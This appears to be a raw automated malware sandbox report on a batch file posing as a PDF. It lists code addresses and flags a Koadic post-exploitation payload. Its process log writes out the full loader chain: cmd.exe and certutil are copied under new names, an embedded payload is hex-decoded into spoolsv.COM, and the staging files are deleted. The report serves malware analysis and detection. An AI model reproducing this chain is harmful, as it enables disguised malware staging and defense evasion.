Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C553F020
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C553CCB8
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C5563800
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C553C120
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C553BC10
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C54CC6F8
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C54BC6D0
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C54A2580
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C55485A8
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C54EE57C
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C5488570
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C5524538
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C54B655C
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C551C630
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C54B8630
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C55585EC
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C54605E0
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C54DE844
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C5542854
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C55348C4
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C55308C8
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C5546750
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C55007D0
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C54D27D0
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C54DC7F0
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C547227C
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C54C6280
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C54AE29C
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C5534274
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C5470140
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C5458170
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C551821C
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C55641F8
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C54AC1D0
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C54DA1E8
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C54E8488
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C54A8484
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C54964A8
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C5530490
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C54CA450
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C54CC450
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C545C520
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C55384D8
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C54C24D4
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C54DE4F0
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C54644E0
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C549E3A0
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C54B0398
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C54E6374
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C553234C
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C54D8414
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C5474410
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C553E430
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C556842F
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C545A424
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C54E43D0
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C5538EAC
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C5534E58
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C5478F1C
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C548EED4
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C5456EF4
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C54C6D7C
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C547EDA4
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C5532D6C
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C54AD094
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C549107C
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C546B09C
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C551511C
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C54F4F94
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C5484F90
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C5451030
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C54D6A84
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C54DEA7C
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C5544A58
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C553AA58
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C5524A40
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C54A4B30
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C54A8990
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C54B6984
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C5452940
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C54DAA00
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C552A9F0
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C54BE9F0
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C54B09EC
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C54CCC80
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C54ECCA8
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C555CC8C
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C5528C58
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C54ACD10
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C5468D00
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C54E2CF8
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C54A8D2C
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C54B2D18
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C5548CF4
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C5506B94
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C5474B68
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C545AC08
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C549CBFC
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C54A0C28
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C54C8BD4
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C550D6A0
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C5507678
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C5537678
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C54A76B0
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C5495648
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C5525660
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C5533638
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C547D660
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C552D6DC
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C54DF6D8
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C548B58C
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C5529580
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C548156C
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C545F610
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C54D95FC
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C54B55F0
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C54B7890
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C54E184C
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C5523874
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C54ED858
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C54A58CC
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C54A9790
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C546B788
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C54D3760
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C546F800
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C5471830
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C5503820
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C54917D4
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C54C77C8
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C54BD7F0
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C5505290
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C552D2B4
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C54E5318
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C54AD2C0
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C54B92C4
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C545F2C0
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C54C92D8
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C54DF168
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C54A11C8
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C546D1B8
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C54A31E0
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C55494A8
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C54B7478
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C54754A0
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C5509494
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C549D440
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C5455438
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C54FD460
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C54CF520
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C55214F0
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C553B3AC
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C5487340
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C547B36C
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C54CD410
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C54573F8
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C549F434
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C55433D0
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C55533D4
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C54DDEB0
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C54ADEA4
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C54DBE70
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C54E5F04
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C54A1ED0
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C54D9EE4
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C555DD84
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C54EBDA0
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C54B1D70
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C5507D70
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C54A9D6C
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C5485DF7
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C54E1E2C
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C5461DE8
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C5488080
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C5522084
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C54BC0B8
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C5451F80
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C5509FF8
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C54B8018
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C5467AB4
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C5509A58
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C54CBA48
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C5483A40
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C54A1A60
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C551BB28
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C54B7AC8
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C54DF990
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C54D19AC
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C5547938
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C554994C
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C5451A10
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C547F9B8
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C54D1C90
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C546BCA4
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C555FC90
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C54A3C60
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C5465D08
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C548DD20
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C5489CD0
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C54ABCE8
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C5519CC0
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C54C1B84
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C545FB84
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C5455BA4
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C54FFB50
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C54E7B74
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C5503C10
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C54AFC34
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C548FC20
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C5479BC8
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C54BDBF0
Source: C:\Users\Public\alpha.exe | Code function: 9_2_00007FF755CAAA54
Source: C:\Users\Public\alpha.exe | Code function: 9_2_00007FF755CA8DF8
Source: C:\Users\Public\alpha.exe | Code function: 9_2_00007FF755CB5554
Source: C:\Users\Public\alpha.exe | Code function: 9_2_00007FF755CB7854
Source: C:\Users\Public\alpha.exe | Code function: 9_2_00007FF755CB37D8
Source: C:\Users\Public\alpha.exe | Code function: 9_2_00007FF755CA3410
Source: C:\Users\Public\alpha.exe | Code function: 9_2_00007FF755CA6EE4
Source: C:\Users\Public\alpha.exe | Code function: 9_2_00007FF755CC7F00
Source: C:\Users\Public\alpha.exe | Code function: 9_2_00007FF755CB0A6C
Source: C:\Users\Public\alpha.exe | Code function: 9_2_00007FF755CCEE88
Source: C:\Users\Public\alpha.exe | Code function: 9_2_00007FF755CAE680
Source: C:\Users\Public\alpha.exe | Code function: 9_2_00007FF755CA4A30
Source: C:\Users\Public\alpha.exe | Code function: 9_2_00007FF755CCAA30
Source: C:\Users\Public\alpha.exe | Code function: 9_2_00007FF755CA2220
Source: C:\Users\Public\alpha.exe | Code function: 9_2_00007FF755CB4224
Source: C:\Users\Public\alpha.exe | Code function: 9_2_00007FF755CA7650
Source: C:\Users\Public\alpha.exe | Code function: 9_2_00007FF755CAD250
Source: C:\Users\Public\alpha.exe | Code function: 9_2_00007FF755CA9E50
Source: C:\Users\Public\alpha.exe | Code function: 9_2_00007FF755CA5240
Source: C:\Users\Public\alpha.exe | Code function: 9_2_00007FF755CACE10
Source: C:\Users\Public\alpha.exe | Code function: 9_2_00007FF755CCD9D0
Source: C:\Users\Public\alpha.exe | Code function: 9_2_00007FF755CA81D4
Source: C:\Users\Public\alpha.exe | Code function: 9_2_00007FF755CA7D30
Source: C:\Users\Public\alpha.exe | Code function: 9_2_00007FF755CD1538
Source: C:\Users\Public\alpha.exe | Code function: 9_2_00007FF755CAB0D8
Source: C:\Users\Public\alpha.exe | Code function: 9_2_00007FF755CA8510
Source: C:\Users\Public\alpha.exe | Code function: 9_2_00007FF755CB18D4
Source: C:\Users\Public\alpha.exe | Code function: 9_2_00007FF755CA1884
Source: C:\Users\Public\alpha.exe | Code function: 9_2_00007FF755CA2C48
Source: C:\Users\Public\alpha.exe | Code function: 9_2_00007FF755CCAC4C
Source: C:\Users\Public\alpha.exe | Code function: 9_2_00007FF755CA6BE0
Source: C:\Users\Public\alpha.exe | Code function: 9_2_00007FF755CCAFBC
Source: C:\Users\Public\alpha.exe | Code function: 9_2_00007FF755CA5B70
Source: C:\Users\Public\alpha.exe | Code function: 9_2_00007FF755CA3F90
Source: C:\Users\Public\alpha.exe | Code function: 9_2_00007FF755CA372C
Source: C:\Users\Public\alpha.exe | Code function: 9_2_00007FF755CA9B50
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF755CAAA54
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF755CA8DF8
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF755CB5554
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF755CB7854
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF755CB37D8
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF755CA3410
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF755CA6EE4
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF755CC7F00
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF755CB0A6C
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF755CCEE88
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF755CAE680
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF755CA4A30
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF755CCAA30
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF755CA2220
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF755CB4224
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF755CA7650
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF755CAD250
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF755CA9E50
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF755CA524010_2_00007FF755CA5240
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF755CACE1010_2_00007FF755CACE10
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF755CCD9D010_2_00007FF755CCD9D0
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF755CA81D410_2_00007FF755CA81D4
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF755CA7D3010_2_00007FF755CA7D30
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF755CD153810_2_00007FF755CD1538
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF755CAB0D810_2_00007FF755CAB0D8
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF755CA851010_2_00007FF755CA8510
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF755CB18D410_2_00007FF755CB18D4
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF755CA188410_2_00007FF755CA1884
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF755CA2C4810_2_00007FF755CA2C48
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF755CCAC4C10_2_00007FF755CCAC4C
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF755CA6BE010_2_00007FF755CA6BE0
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF755CCAFBC10_2_00007FF755CCAFBC
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF755CA5B7010_2_00007FF755CA5B70
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF755CA3F9010_2_00007FF755CA3F90
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF755CA372C10_2_00007FF755CA372C
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF755CA9B5010_2_00007FF755CA9B50
Source: C:\Users\Public\alpha.exe Code function: String function: 00007FF755CB498C appears 40 times
Source: C:\Users\Public\alpha.exe Code function: String function: 00007FF755CB081C appears 36 times
Source: C:\Users\Public\alpha.exe Code function: String function: 00007FF755CB3448 appears 72 times
Source: C:\Users\Public\kn.exe Code function: String function: 00007FF6C5510D10 appears 181 times
Source: C:\Users\Public\kn.exe Code function: String function: 00007FF6C550ABFC appears 818 times
Source: C:\Users\Public\kn.exe Code function: String function: 00007FF6C55664A6 appears 173 times
Source: C:\Users\Public\kn.exe Code function: String function: 00007FF6C548BC9C appears 280 times
Source: C:\Users\Public\kn.exe Code function: String function: 00007FF6C545D1C8 appears 41 times
Source: C:\Users\Public\kn.exe Code function: String function: 00007FF6C54EEB98 appears 93 times
Source: C:\Users\Public\kn.exe Code function: String function: 00007FF6C5517BAC appears 34 times
Source: C:\Users\Public\kn.exe Code function: String function: 00007FF6C5517D70 appears 35 times
Source: C:\Users\Public\kn.exe Code function: String function: 00007FF6C555F1B8 appears 183 times
Source: C:\Users\Public\kn.exe Code function: String function: 00007FF6C555F11C appears 37 times
Source: 1x40 CONTAINER.PDF-.bat, type: SAMPLE Matched rule: MALWARE_BAT_KoadicBAT author = ditekSHen, description = Koadic post-exploitation framework BAT payload
Source: classification engine Classification label: mal84.bank.evad.winBAT@20/8@0/0
Source: C:\Users\Public\alpha.exe Code function: 3_2_00007FF755CA32B0 _get_osfhandle,GetConsoleScreenBufferInfo,WriteConsoleW,wcschr,FormatMessageW,GetConsoleScreenBufferInfo,WriteConsoleW,GetStdHandle,FlushConsoleInputBuffer,GetConsoleMode,SetConsoleMode,_getch,SetConsoleMode,GetConsoleScreenBufferInfo,FillConsoleOutputCharacterW,SetConsoleCursorPosition,GetLastError,GetLastError
Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF6C553826C GetCurrentThread,GetLastError,#357,OpenThreadToken,GetLastError,GetCurrentProcess,GetLastError,OpenProcessToken,GetLastError,AdjustTokenPrivileges,GetLastError,GetLastError,CloseHandle,CloseHandle
Source: C:\Users\Public\alpha.exe Code function: 3_2_00007FF755CCFB54 memset,GetDiskFreeSpaceExW,??_V@YAXPEAX@Z
Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF6C54946C0 CoCreateInstance,#357,SysFreeString
Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF6C5516320 FindResourceW,GetLastError,#357,LoadResource,GetLastError,LockResource,GetLastError
Source: C:\Windows\System32\extrac32.exe File created: C:\Users\Public\alpha.exe
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7284:120:WilError_03
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\1x40 CONTAINER.PDF-.bat" "
Source: C:\Windows\System32\extrac32.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: 1x40 CONTAINER.PDF-.bat ReversingLabs: Detection: 27%
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\1x40 CONTAINER.PDF-.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
Source: C:\Users\Public\alpha.exe Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\1x40 CONTAINER.PDF-.bat" "C:\\Users\\Public\\spoolsv.MPEG" 9
Source: C:\Users\Public\alpha.exe Process created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\1x40 CONTAINER.PDF-.bat" "C:\\Users\\Public\\spoolsv.MPEG" 9
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\spoolsv.MPEG" "C:\\Users\\Public\\Libraries\\spoolsv.COM" 12
Source: C:\Users\Public\alpha.exe Process created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\spoolsv.MPEG" "C:\\Users\\Public\\Libraries\\spoolsv.COM" 12
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\spoolsv.MPEG" / A / F / Q / S
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\1x40 CONTAINER.PDF-.bat" "C:\\Users\\Public\\spoolsv.MPEG" 9
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\spoolsv.MPEG" "C:\\Users\\Public\\Libraries\\spoolsv.COM" 12
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\spoolsv.MPEG" / A / F / Q / S
Source: C:\Users\Public\alpha.exe Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
Source: C:\Users\Public\alpha.exe Process created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\1x40 CONTAINER.PDF-.bat" "C:\\Users\\Public\\spoolsv.MPEG" 9
Source: C:\Users\Public\alpha.exe Process created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\spoolsv.MPEG" "C:\\Users\\Public\\Libraries\\spoolsv.COM" 12
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\System32\extrac32.exe Section loaded: cabinet.dll
Source: C:\Windows\System32\extrac32.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\extrac32.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\extrac32.exe Section loaded: textinputframework.dll
Source: C:\Windows\System32\extrac32.exe Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\extrac32.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\extrac32.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\extrac32.exe Section loaded: wintypes.dll
